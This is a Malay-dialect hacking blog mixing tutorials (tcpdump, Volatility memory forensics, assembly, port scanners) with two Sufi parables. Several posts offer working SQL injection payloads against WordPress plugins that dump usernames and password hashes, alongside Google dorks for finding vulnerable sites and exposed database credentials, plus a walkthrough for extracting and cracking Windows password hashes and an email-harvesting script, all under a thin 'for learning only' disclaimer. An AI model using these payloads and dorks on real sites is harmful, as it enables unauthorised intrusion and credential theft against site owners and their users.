Berikut adolah senarai istilah yang biaso kito akan jumpo dalam proses buffer overflow

Register
Dalam computer architecture, processor register adalah storage kecil yang terdapat pado CPU, yang mano kandungannya boleh dicapai dengan lobih pantas berbanding storan yang lain. Secaro amnya, resiter ini tidak dianggap sebahagian daripado memory biaso PC.

Register berado di eteh memory hierarchy.

API
API (Application Programming Interface) adolah sebahagian rule dan spesifikasi yang mano program bulih gunokan untuk berhubung sesamo mereka. API bertindak sebagai interface antaro software programs dan membantu proses interaksi, lebih kurang macam user interface membantu interaksi antaro pengguna(manusia) dan komputer.

Assembly Language
Assembly Language adolah low level programming language untuk komputer, microprosessors,
microcontrollers dan device-device lain. Cakap mudah eh, assembly ni adolah bahaso mesin.

Assembly Language ni berbezo berdasarkan architechure computer.

Contoh code:
ghimau.asm
  1. section    .text  
  2.     global _start             
  3.   
  4. _start:                     
  5.   
  6.     mov    edx,len     
  7.     mov    ecx,msg     
  8.     mov    ebx,1     
  9.     mov    eax,4     
  10.     int    0x80     
  11.   
  12.     mov    eax,1     
  13.     int    0x80     
  14.   
  15. section    .data  
  16.   
  17. msg    db    'ghimau r0x!',0xa     
  18. len    equ    $ - msg             


Untuk compile dan run, gunokan command kek bawah ni.
  1. nasm -f elf ghimau.asm  
  2. ld -s -o ghimau ghimau.o  
  3. ./ghimau  



Nanti bersambung lagi untuk siri yang kedua. Insya ALLAH :)

Google Dorks

Posted by ghimau under ,
Google dork untuk hari ni. Maklumat yang diaparkan adalah untuk tujuan pembelajaran sahajo. Sebarang penyalahgunaan maklumat adolah eteh tanggungjawap anda sendiri.

  1. inurl:loader-wizard ext:php  
  2. inurl:sarg inurl:siteuser.html  
  3. inurl:/install/install.php intitle:vBulletin * Install System  




Syaikh dan Muridnya

Posted by ghimau under


Seorang murid yang masih muda, tak diketahui syaikhnya (seperti dikiranya) mempunyai sekedar simpanan emas. Syaikh itu tak berkata apa-apa, dan suatu hari mereka pergi bersama-sama dalam suatu perlawatan. Akhirnya mereka sampai ke sebuah lembah yang gelap; di tempat masuk ke lembah itu terbentang dua jalan. Si murid mulai khawatir, sebab emas (memang) merusak pemiliknya. Gemetar ia pun bertanya pada syaikhnya, “Jalan mana yang mesti kita tempuh?” Syaikh itu menjawab, “Bebaskan dirimu dari apa yang membuatmu khawatir itu, maka jalan mana pun tak menjadi soal. Setan takut akan orang yang tak mempedulikan uang, dan cepat akan menghindar daripadanya. Demi sebutir emas kau membelah sehelai rambut. Secara agama, emas seperti keledai yang lumpuh; tak ada harganya, hanya merupakan beban. Bila kekayaan datang pada seseorang dengan tak disangka-sangka, mula-mula akan membuatnya bingung, kemudian menguasainya. Ia yang terikat dengan cinta akan uang dan harta milik, terikatlah tangan dan kakinya dan dilontarkan ke dalam lubang-penjara. Hindarilah lubang penjara yang dalam ini jika kau bisa; jika tidak, tahan nafasmu, sebab udara didalamnya amat luar biasa pengapnya.”

Cerita tentang Rabi’ah

Posted by ghimau under


Rabi’ah, meskipun seorang wanita, namun merupakan mahkota laki-laki. Sekali ia mempergunakan waktunya delapan tahun untuk pergi haji ke Ka,bah dengan mengingsutkan panjang badannya di tanah. Ketika akhirnya ia sampai ke pintu rumah suci itu, ia berpikir, “Kini akhirnya telah kutunaikan kewajibanku.” Pada hari suci ketika ia hendak menghadapkan diri ke Ka’bah, perempuan-perempuan pengiringnya meninggalkannya. Maka Rabi’ah pun menyelusuri jejaknya semula dan berkata, “O Tuhan yang memiliki seri keagungan, delapan tahun lamanya hamba telah mengukur jalan dengan panjang badan hamba, dan kini, ketika hari yang dirindukan itu telah tiba sebagai jawaban atas doa-doa hamba, Tuan letakkan duri-duri di jalan hamba!”

Untuk memahami arti peristiwa demikian perlu pula mengetahui seorang pencinta Tuhan seperti Rabi’ah itu. Selama kau terapung-apung di lautan dunia yang dalam, ombak-ombaknya akan menerima dan menolakmu berganti-ganti. Kadang-kadang kau akan diperkenankan sampai ke Ka’bah, kadang-kadang pula kau akan menarik nafas panjang (karena kecewa) berada di sebuah kuil. Jika kau berhasil menarik diri dari keterikatan dengan dunia ini, kau akan menikmati kebahagiaan; tetapi jika kau tinggal terikat, kepalamu akan berpusing-pusing bagai batu giling pada perkakas penggiling. Tidak sejenak pun kau akan tenang; kau akan terganggu oleh seekor nyamuk saja pun.

Ok, kali ni den nak kongsi teknik forensic untuk dapatkan password dan windows password hash dari physical memory.

Macam yang kita ketahui, benda-benda ni disimpan dalam memory pc kita. Teknik yang sama digunakan oleh ahli forensics untuk menganalisa sekiranya ado malware yang reside dalam memory.

Ok, tanpa membuang maso. Mulo-mulo untuk dump memory ni, kito gunakan satu tools mdd
command yang kito gunakan adolah
  1. mdd_1.3.exe -o [nama_fail]  



Untuk tujuan memory analysis kito akan gunokan tools volatility

Gunokan command berikut untuk memaparkan senarai proses yang running.
  1. python volatility pslist -f [nama_image]  



Gunokan command berikut untuk melihat connections
  1. python volatility connscan -f [nama_image]  



Gunokan command berikut untuk mendapatkan maklumat am tentang image
  1. python volatility ident -f [nama_image]  



Gunokan command berikut untuk string dan offset. Untuk tujuan ni, kono download utllity strings.exe dari sysinternals
  1. strings.exe -a -o -n 5 [nama_image] > [nama_fail]  



Hasil dari langkah kek eteh tu, kito leh gunakan options string dalam volatility untuk carik string yang spesisifik

Ok.. kito nengok macam mano nak dapekkan password hash bagi windows logon Kito kono dapekkan hiveoffset dari memory image kito. Untuk ni kono ado module yang berkaitan dengan registry. Leh download kek sini :

http://kurtz.cs.wesleyan.edu/%7Ebdolangavitt/memory/volreg-0.2.zip

Pastu gunokan command seperti kek bawah ni
  1. python volatility hivescan -f [nama_image]  



Gunakan command kek bawah ni. Amik nilai offset yang pertama pado step sebelumnya.
Gunakan nilai hex. Amik nilai offset bagi SAM dan system untuk langkah berikutnya
  1. python volatility hivelist -f [nama_image] -o [nilai_offset]  



Gunakan command kek bawah ni untuk dapatkan password hash. (Gunakan nilai offset
SAM dan system)
  1. python volatility hashdump -f [nama_image] -y 0xe1037b60 -s 0xe1c64b60  



Sotolah kito dapek hash file tersobut, kito bulihlah crack. Ado beberapo tools yang bulih digunakan untuk tujuan ni : SamInside, Ophcrack. Untuk tutorial ni den gunokan SamInside.


Sekian dulu untuk kali ni. Hehehe. :)

vortex level 0

Posted by ghimau under ,
Huhuhu.. python memang jauh lagi simple dari c :)

  1. import socket  
  2. import struct  
  3.   
  4. host = "vortex.labs.overthewire.org"  
  5. port = 5842  
  6. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  7.   
  8. try:  
  9.  s.connect((host, port))  
  10. except Exception:  
  11.  print ("[+] Ralat! : Tidak dapat connect pada server")  
  12.    
  13. jumlah = 0  
  14. for n in range(4):  
  15.  data = s.recv(4)  
  16.  jumlah += struct.unpack("<I", data)[0]   
  17. s.send(struct.pack("<I", (jumlah & 0xFFFFFFFF)))   
  18. print s.recv(1000) s.close()  


Socket dalam python:



Baru tahu pasal struct :)

Salam.. ni den nak kongsi satu sql injection bug kek Satu component wordpress. Maklumat ini adolah untuk tujuan pembelajaran sahajo. Segalo penyalahgunaan maklumat adalah atas tanggungjawap anda sendiri :)

Ok.. ni google dork untuk mencari site yang vulnerable. Dork ni bulih diubahsuai untuk mendapatkan lobih banyak target.
  1. inurl:"wp-content/plugins/forum-server/feed.php"  


Dan ini adolah exploit code eh.
  1. feed.php?topic=1+union+select+group_concat(user_login,0x3a,user_pass)  
  2. +from+wp_users--  


Ni contoh POC target yang mempunyai kelemahan yang dinyatokan kek eteh tu.



Ni pulak adolah perl script yang den buek untuk extract maklumat dari kelemahan sqli

Kompozer.net

Posted by ghimau under ,
Apo bondo eh ni? Ni adolah satu tools untuk tujuan web authoring. Tools ini menggunokan konsep WYSIWYG. Dio ni macam dreamweaver la.. cumo loboh lightweight. Nak gunokan eh pun mudah.

Kalau berminat bulih lah layari laman web eh kek sini : http://kompozer.net/

Ni adolah antaramuko tool ni. Nampak mudah dan mesra pengguno.


Kek sini kito bulih nengok general setting.


Tools ni jugak membulihkan kito buek source code editing. Jadi bulihlah kito tambah atau ubahsuai mengikut citoraso kito :)


Kek sini kito bulih la membuat setting am untuk tujuan publishing dan lain-lain lagi.


Ok la yo. Kalau ado yang berminat nak gunokan tool ni bulihlah download, install dan cubo guno. Kalau ado masalah.. silo lah bertanya dalam ruangan komen. Insya ALLAH den akan bantu :)
Salam semuo. Apo khabar haghi ni.. Den nak sambung tutorial penggunaan tcpdump/windump siri yang ketigo.
Kot ado yang xpaham, leh la tanyo dan kongsi kek ruangan komen tu yo.

Tanpa membuang maso, kito nengok lak apo laie command-command yang bulih dibuek melalui tool ini.

Command 11 :
  1. windump -i [interface] port no_port  

untuk melihat trafic pado port yang dinyatokan.



Command 12 :
  1. windump -i [interface] src port no_port  

untuk melihat traffic dari sumber port yang dinyatokan



  1. windump -i [interface] dst port no_port  

untuk melihat traffic ke destinasi port yang dinyatokan


Command 13 :
  1. windump -i [interface] udp and src port 53  

untuk melihat traffic dns



Command 14 :
  1. windump -i [interface] portrange [no_port]-[no_port]  

untuk melihat traffic dari range port yang dinyatokan



Command 15 :
  1. windump -i [interface] less [byte]  

untuk melihat traffic yang lebih kecil dari byte yang dinyatokan



  1. windump -i [interface] greater [byte]  

untuk melihat traffic yang lebih besar dari byte yang dinyatokan


* Boleh juga guno format ni :
  1. <  
  2. <=  
  3. >  
  4. >=  


Ok.. setakat ni dulu yo untuk kali ni.. nanti ado maso kita sambung part 4 pulak :)
Ni adolah senarai command untuk post kali ni :
  1. windump -i [interface] port no_port  
  2. windump -i [interface] src port no_port  
  3. windump -i [interface] dst port no_port  
  4. windump -i [interface] udp and src port 53  
  5. windump -i [interface] portrange [no_port]-[no_port]  
  6. windump -i [interface] less [byte]  
  7. windump -i [interface] greater [byte]  

Google Dork

Posted by ghimau under ,
Salam semuo. Hari ni den nak kongsi beberapo google dork untuk korang cubo. Gunokan eteh tanggungjawap sendiri. Salah guno, sendiri tanggung yo :)

  1. intitle:phpmyadmin inurl:server_processlist.php  
  2. Filetype: inc intext: mysql_connect  
  3. "parent directory" +proftpdpasswd  
  4. allintext:”Safe-mode: OFF (not secure)”  
  5. filetype:inc mysql_connect("localhost","root"  
  6. inurl:/phpmyadmin/scripts/setup.php  

So macam mano nak gunokan menatang ni? Hehehe.. copy salah satu dork kek eteh tu, dan masukkan kek ruangan google search. Pastu tokan la butang carian :)



Dan ini lah salah satu hasil dari carian menggunokan dork di eteh tu.

Salam, den nak kongsi script python simple untuk tujuan email harvesting dari web. Bolehlah korang kalau nak cubo script ni. Script ni simple yo, nanti ado maso den nak tambah fungsi proxy dan cek kalau ado redundant entry.

  1. #!/usr/bin/env python  
  2. import urllib, re, os  
  3. os.system('cls')  
  4. print  ' _   ___   _  '  
  5. print  '(_:( ._. ):_) ***********************************  '  
  6. print  '   =(( ))=    * simple email grabber | ghimau   *  '  
  7. print  '    ( - )     ***********************************  '  
  8. print  
  9.   
  10. url = raw_input("Masukkan URL: ")  
  11. print  
  12. source = urllib.urlopen(url).read()  
  13. r = re.compile('(?<=href="mailto:).*?(?=")')  
  14. emails = r.findall(source)  
  15. print '-----------------'  
  16. print '[+] Senarai email'  
  17. print '-----------------'  
  18. print '\n'.join(emails)  

Salam semuo. Apo khabar haghi ni.. Den nak sambung tutorial penggunaan tcpdump/windump siri yang keduo.
Kot ado yang xpaham, leh la tanyo dan kongsi kek ruangan komen tu yo.

Tanpa membuang maso, kito nengok lak apo laie command-command yang bulih dibuek melalui tool ini.

Command 6 :
  1. windump -i [interface] protocol  

protocol yang bulih digunokan sebagai filter adolah : tcp, udp dan icmp



Command 7 :
  1. windump -i [interface] -nnvXs 1514 -c2 icmp  

-s untuk snaplength
-c untuk capture berapa bilangan packets



Command 8 :
  1. windump -i [interface] host no_ip  

host : dapatkan traffic berdasarkan host ip yang disetkan



Command 9 :
  1. windump -i [inteface] src no_ip  

src : dapatkan traffic berdasarkan source ip yang disetkan



  1. windump -i [interface] dst no_ip  

dst : dapatkan traffic berdasarkan destination ip yang disetkan



Command 10 :
  1. windump -i [interface] net x.x.x.0/24  

net untuk sniff keseluruhan subnet



Ok.. setakat ni dulu yo untuk kali ni.. nanti ado maso kita sambung part 3 pulak :)
Ni adolah senarai command untuk post kali ni :
  1. windump -i [interface] protocol  
  2. windump -i [interface] -nnvXs 1514 -c2 icmp  
  3. windump -i [interface] host no_ip  
  4. windump -i [inteface] src no_ip  
  5. windump -i [inteface] dst no_ip  
  6. windump -i [interface] net x.x.x.0/24  

Google Dork

Posted by ghimau under
Salam semuo. Hari ni den nak kongsi beberapo google dork untuk korang cubo. Gunokan eteh tanggungjawap sendiri. Salah guno, sendiri tanggung yo :)

  1. "error_log" inurl:/wp-content  
  2. filetype:xls password inurl:.com  
  3. filetype:ini "pdo_mysql" (pass|passwd|password|pwd)  
  4. filetype:ini "precurio" (pass|passwd|password|pwd)  
  5. filetype:ini "FtpInBackground" (pass|passwd|password|pwd)  
  6. filetype:ini "[FFFTP]" (pass|passwd|password|pwd)  
  7. inurl:"fbconnect_action=myhome"  


Dork yang last tu untuk cari kelemahan sqli pado component fbconnect dalam wp. Ni bug sql dio
  1. fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,  
  2. concat(user_login,0x3a,user_pass)  
  3. kambing,7,8,9,10,11,12+from+  
  4. wp_users--  

Salam semua. Den nak kongsi tutorial ringkas menggunakan tcpdump/windump. tcpdump adalah tool untuk tujuan packet sniffing. tcpdump merupakan satu tool yang berkesan dan komprehensif untuk tujuan network sniffing.

Berikut adalah option yang terdapat dalam tcpdump
  1. -i any : Listen on all interfaces just to see if you're seeing any traffic.  
  2. -n : Don't resolve hostnames.  
  3. -nn : Don't resolve hostnames or port names.  
  4. -X : Show the packet's contents in both hex and ASCII.  
  5. -XX : Same as -X, but also shows the ethernet header.  
  6. -v, -vv, -vvv : Increase the amount of packet information you get back.  
  7. -c : Only get x number of packets and then stop.  
  8. -S : Print absolute sequence numbers.  
  9. -e : Get the ethernet header as well.  
  10. -q : Show less protocol information.  
  11. -E : Decrypt IPSEC traffic by providing an encryption key.  
  12. -s : Set the snaplength, i.e. the amount of data that is being captured in bytes  
  13. -c : Only capture x number of packets, e.g. 'tcpdump -c 3'  


Ok .. tanpo membuang maso, kito teruskan kepado penggunaan tools ni. Untuk contoh ni den gunokan windump,
samo yo dengan tcpdump. By the way, jangan lupo untuk install winpcap dulu yo :)

Command 1 :
  1. windump -D  


Command ni untuk memaparkan senarai interface yang ado

Command 2 :
  1. windump -i [interface]  


command ni untuk memilih interface

Command 3:
  1. windump -i [interface] -nS  


ini merupokan command asas untuk sniffing.
-n untuk tidak resolve hostname, so orang payah skit la nak detect kito tongah sniff, dan proses sniffing pun lobih copek :)
-S untuk paparkan absolute sequence number

Command 4 :
  1. windump -i [interface] -nnvvS  


ini untuk hasil yang lobih verbose
-nn untuk tak resolve hostname dan port name
-vv untuk vebosity level

Command 5 :
  1. windump -i [interface] -nnvvXS  


ini untuk lebih ke dalam lagi :) deeper inspection
-X untuk memaparkan kandungan packet dalam format hex dan aschii

Ok.. setakat ni dulu yo untuk kali ni.. nanti ado maso kita sambung part 2 pulak :)
Ni adolah senarai command untuk post kali ni :
  1. windump -D  
  2. windump -i [interface]  
  3. windump -i [interface] -nS  
  4. windump -i [interface] -nnvvS  
  5. windump -i [interface] -nnvvXS  

Illumination Software Creator

Posted by ghimau under
Salam, den nak kongsi dengan korang semuo satu tools untuk membantu programmer membuek coding.

Ni tagline dari website diorang :
llumination Software Creator allows anyone to create their own software applications… without writing a single line of “code”.

Macam best kan. Hehehe.. dan dah cubo guno.. agak poning gak sobab documentation eh macam hampeh. By the way.. nak download software ni korang kene gi kat sini : http://radicalbreeze.com/

Untuk post ni den akan kongsi buek satu simple application guno pythongtk.

Ni adolah paparan untuk interface. Sonang yo nak buek interface eh.. drag and drop yo. Masalah sikit sebab documentation dia tak lengkap sangat. So kena pandai-pandailah nak explore.



Lopeh tu kito buek la logic flow eh. Kat sini ada beberap option, kalau nak buek aplikasi yang bosar dan banyak logic flow memang tak sesuai la nak guno tools ni.



Lopeh dah siap leh la test run aplikasi kito tu :) Nice... Menggukan teknik penipuan.. hehehe.. den hanyo parse command kepado nmap dan paparkan result dalam mesej box. Poning pakcik dongan gtk ni. Tapi tools ni memudahkan nak buek UI la.




Ni adolah coding longkap. Korang leh try la kalau nak :)
  1. #!/usr/bin/env python  
  2.   
  3. import pygtk  
  4. pygtk.require('2.0')  
  5. import gobject  
  6. import random  
  7. import os  
  8. import gtk  
  9. import os  
  10. #EndImports  
  11.   
  12. class iscApp1:  
  13.  iscVoutput = ""  
  14.  iscVinput = ""  
  15.  iscWindow4Window1 = gtk.Window(gtk.WINDOW_TOPLEVEL)  
  16.  iscWindow4Window1Fixed = gtk.Fixed()  
  17.  iscWindow4Label0 =gtk.Label("SIMPLE TCP IP PORT SCANNER | by ghimau")  
  18.  iscWindow4Label20 =gtk.Label("*******************************************")  
  19.  iscWindow4Label30 =gtk.Label("Target IP :")  
  20.  iscWindow4TextBox0 = gtk.Entry()  
  21.  iscWindow4Button0 = gtk.Button("Mula Scan")  
  22.  iscWindow4Button10 = gtk.Button("Keluar Aplikasi")  
  23.   
  24.  #EndOfGlobalVariables  
  25.   
  26.  def main(self):  
  27.   gtk.main()  
  28.   
  29.  def destroy(self, widget, data=None):  
  30.   gtk.main_quit()  
  31.   
  32. #EndOfClass  
  33.   
  34. def iscGetTextBox5():  
  35.  thisiscApp1.iscVinput = "nmap -sS -PN " + thisiscApp1.iscWindow4TextBox0.get_text() + " | findstr open"  
  36.  iscSystemScript2()  
  37.  #iscGetTextBox5Done  
  38.   
  39.   
  40. def iscAppQuit6():  
  41.  thisiscApp1.destroy(None,None)  
  42.  #iscAppQuit6Done  
  43.   
  44.   
  45. def iscMessageBox3():  
  46.  message = thisiscApp1.iscVoutput  
  47.  dialog = gtk.MessageDialog(None, gtk.DIALOG_MODAL, gtk.MESSAGE_INFO, gtk.BUTTONS_NONE, message)  
  48.  dialog.add_button(gtk.STOCK_CLOSE, gtk.RESPONSE_CLOSE)  
  49.  dialog.run()  
  50.  #iscMessageBox3Open  
  51.  dialog.destroy()  
  52.  #iscMessageBox3Closed  
  53.   
  54. def iscWindow4():  
  55.  thisiscApp1.iscWindow4Label0 =gtk.Label("SIMPLE TCP IP PORT SCANNER | by ghimau")  
  56.  thisiscApp1.iscWindow4Label20 =gtk.Label("*******************************************")  
  57.  thisiscApp1.iscWindow4Label30 =gtk.Label("Target IP :")  
  58.  thisiscApp1.iscWindow4TextBox0 = gtk.Entry()  
  59.  thisiscApp1.iscWindow4Button0 = gtk.Button("Mula Scan")  
  60.  thisiscApp1.iscWindow4Button10 = gtk.Button("Keluar Aplikasi")  
  61.  thisiscApp1.iscWindow4Window1 = gtk.Window(gtk.WINDOW_TOPLEVEL)  
  62.  thisiscApp1.iscWindow4Window1Fixed = gtk.Fixed()  
  63.  thisiscApp1.iscWindow4Window1.set_title("Simple TCP Port Scanner ")  
  64.  thisiscApp1.iscWindow4Window1.set_default_size(303163)  
  65.  thisiscApp1.iscWindow4Window1.add(thisiscApp1.iscWindow4Window1Fixed)  
  66.  thisiscApp1.iscWindow4Window1Fixed.width = 303  
  67.  thisiscApp1.iscWindow4Window1Fixed.height = 163  
  68.  thisiscApp1.iscWindow4Window1.connect("delete_event", iscWindow4Closed)  
  69.  thisiscApp1.iscWindow4Window1Fixed.show()  
  70.  thisiscApp1.iscWindow4Window1Fixed.put(thisiscApp1.iscWindow4Label0, 3818)  
  71.  thisiscApp1.iscWindow4Label0.set_size_request(21812)  
  72.  thisiscApp1.iscWindow4Label0.show()  
  73.  thisiscApp1.iscWindow4Window1Fixed.put(thisiscApp1.iscWindow4Label20, 1637)  
  74.  thisiscApp1.iscWindow4Label20.set_size_request(27715)  
  75.  thisiscApp1.iscWindow4Label20.show()  
  76.  thisiscApp1.iscWindow4Window1Fixed.put(thisiscApp1.iscWindow4Label30, 2170)  
  77.  thisiscApp1.iscWindow4Label30.set_size_request(6412)  
  78.  thisiscApp1.iscWindow4Label30.show()  
  79.  thisiscApp1.iscWindow4Window1Fixed.put(thisiscApp1.iscWindow4TextBox0, 8864)  
  80.  thisiscApp1.iscWindow4TextBox0.set_text("")  
  81.  thisiscApp1.iscWindow4TextBox0.set_size_request(12323)  
  82.  thisiscApp1.iscWindow4TextBox0.connect("changed", iscWindow4TextBoxChanged)  
  83.  thisiscApp1.iscWindow4TextBox0.show()  
  84.  thisiscApp1.iscWindow4Window1Fixed.put(thisiscApp1.iscWindow4Button0, 25109)  
  85.  thisiscApp1.iscWindow4Button0.set_size_request(6227)  
  86.  thisiscApp1.iscWindow4Button0.connect("clicked", iscWindow4ButtonClicked)  
  87.  thisiscApp1.iscWindow4Button0.show()  
  88.  thisiscApp1.iscWindow4Window1Fixed.put(thisiscApp1.iscWindow4Button10, 93110)  
  89.  thisiscApp1.iscWindow4Button10.set_size_request(8026)  
  90.  thisiscApp1.iscWindow4Button10.connect("clicked", iscWindow4Button1Clicked)  
  91.  thisiscApp1.iscWindow4Button10.show()  
  92.  thisiscApp1.iscWindow4Window1.show()  
  93.  #iscWindow4Opened  
  94.  #iscWindow4Done  
  95.   
  96.   
  97. def iscWindow4Closed(self, other):  
  98.  pass  
  99.  iscAppQuit6()  
  100.  #iscWindow4Closed  
  101.   
  102.   
  103. def iscWindow4TextBoxChanged(self):  
  104.  pass  
  105.  #iscWindow4TextBoxChanged  
  106.   
  107.   
  108. def iscWindow4ButtonClicked(self):  
  109.  pass  
  110.  iscGetTextBox5()  
  111.  #iscWindow4ButtonClicked  
  112.   
  113.   
  114. def iscWindow4Button1Clicked(self):  
  115.  pass  
  116.  iscAppQuit6()  
  117.  #iscWindow4Button1Clicked  
  118.   
  119.   
  120. def iscSystemScript2():  
  121.  # Leading spaces required as indent...  
  122.  thisiscApp1.iscVoutput=os.popen( thisiscApp1.iscVinput ).read()  
  123.  # Line below is where Output 1 is called...  
  124.  iscMessageBox3()  
  125.  # Leading spaces required as indent...  
  126.  thisiscApp1.iscVoutput=os.popen( thisiscApp1.iscVinput ).read()  
  127.  # Line below is where Output 1 is called...  
  128.  #iscSystemScript2Done  
  129.   
  130. #EndOfFunctions  
  131.   
  132. thisiscApp1 = iscApp1()  
  133.   
  134. iscWindow4()  
  135. #iscApp1Launched  
  136. #EndOfStatements  
  137.   
  138. thisiscApp1.main()  

Salam semua.. lamonya tak update blog ni yer. Hehehe.. Hmm.. nak buat mcm mana..bz sungguh skang ni. Nak2 si aiman ni dah makin nakal dah :)

Post kali ni den nak kongsi script python untuk buat port scanning asas, Layan...
  1. #!/usr/bin/env python  
  2. import os  
  3. from socket import *   
  4. sen_port = [2122258033893306]  
  5.   
  6. if __name__ == '__main__':  
  7.  os.system('cls')  
  8.  print  ' _   ___   _  '  
  9.  print  '(_:( ._. ):_) **************************************  '  
  10.  print  '   =(( ))=    * simple tcp port scanner | ghimau   *  '  
  11.  print  '    ( - )     **************************************  '  
  12.  print  
  13.  target = raw_input('Masukkan target untuk scan: ')  
  14.  print  
  15.  targetIP = gethostbyname(target)  
  16.  print '[+] Mula scan terhadap ip :', targetIP  
  17.   
  18.  for i in sen_port:  
  19.   s = socket(AF_INET, SOCK_STREAM)  
  20.   
  21.   result = s.connect_ex((targetIP, i))  
  22.   
  23.   if(result == 0) :  
  24.    print '[+] Port %d: BUKA' % (i,)  
  25.   s.close()  

Dekat variable sen_port tu korang leh la tambahkan apa-apa nombor port lain. Kalai nak buat dia check semua port.. ubah sikit kat for loop tu.